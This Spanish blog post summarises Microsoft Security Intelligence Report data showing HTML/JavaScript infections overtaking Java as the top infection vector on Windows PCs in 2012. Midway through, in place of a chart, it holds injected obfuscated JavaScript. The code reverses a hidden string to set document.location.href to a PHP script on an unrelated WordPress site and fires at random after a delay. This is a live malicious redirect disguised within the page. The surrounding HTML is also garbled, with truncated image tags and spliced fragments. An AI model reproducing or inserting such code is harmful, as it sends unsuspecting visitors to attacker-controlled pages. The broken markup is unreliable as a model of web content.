Java ya no es líder de infecciones de PCs
Últimamente han habido bastantes discusiones sobre si realmente Java tiene un problema de seguridad, y cuánta gente se infecta a través de Java. Según las estimaciones de Kaspersky, Java es responsable del 50% de todas las infecciones de equipos en 2012; este dato parece tremendamente exagerado. Aunque sólo sea porque hay demasiadas vulnerabilidades para que una sola de ellas acapare la mitad de los ataques.
Así que volviendo a buscar datos, y actualizar el artículo “Java sigue siendo líder en vulnerabilidades” de hace poco más de un año, en la fuente más fiable, al menos en lo que infecciones para PCs Windows se refiere: Microsoft Security Intelligence Report
Primero, las buenas noticias: Java ya no es el vector de ataque líder en infecciones de equipos, al menos no en PCs Windows. Las fantásticas aplicaciones HTML 5 están consiguiendo que las infecciones a través de HTML/JavaScript hayan crecido espectacularmente, especialmente a lo largo de 2011, y a mediados del 2012 han superado al número de infecciones causadas por Java. Ahora las malas noticias: las infecciones a través de Java siguen creciendo considerablemente. Aquí se muestra un gráfico resumiendo la evolución de las infecciones:
tores%20de%20infeccin%202012.png?__SQUARESPACE_CACHEVERSION=1357929031517″ width=”1133″ height=”637″ />
Este gráfico forma parte del “Microsoft Security Intelligence Report v 13”, que contiene datos hasta el segundo trimestre de 2012. Microsoft no ha hecho públicos los datos del tercer y cuarto trimestres de 2012 (que formarán parte de la versión 14 del informe).
Los datos de esa gráfica surgen de los resultados que la MRT (Microsoft Removal Tool) envía cada mes a los servidores de Microsoft. La MRT es un antivirus no residente que se actualiza en nuestros equipos cada mes a través de la actualización de Windows Update y que se ejecuta en el siguiente arranque realizado por el equipo después de la actualización. Si encuentra alguna infección, además de eliminarla, lo notifica a Microsoft.
Este es un gráfico con la evolución de los malwaremás populares, junto con la vulnerabilidad en la que se basan:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torage/imagenes/Virus%20ms%20comunes%202012.png?__SQUARESPACE_CACHEVERSION=1357929416201″ width=”1134″ height=”481″ /></p>
<p>Y este gráfico muestra la evolución de infecciones debidas a los agujeros de seguridad responsables de más infecciones dentro de la plataforma Java:</p>
<p><img decoding=)
to de vista teórico Java tiene o no un problema de seguridad. Desde un punto de vista práctico sí que lo tiene. Y si no que se lo digan a los aproximadamente 15 millones de equipos que se infectaron a través de Java en el período analizado por este informe.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.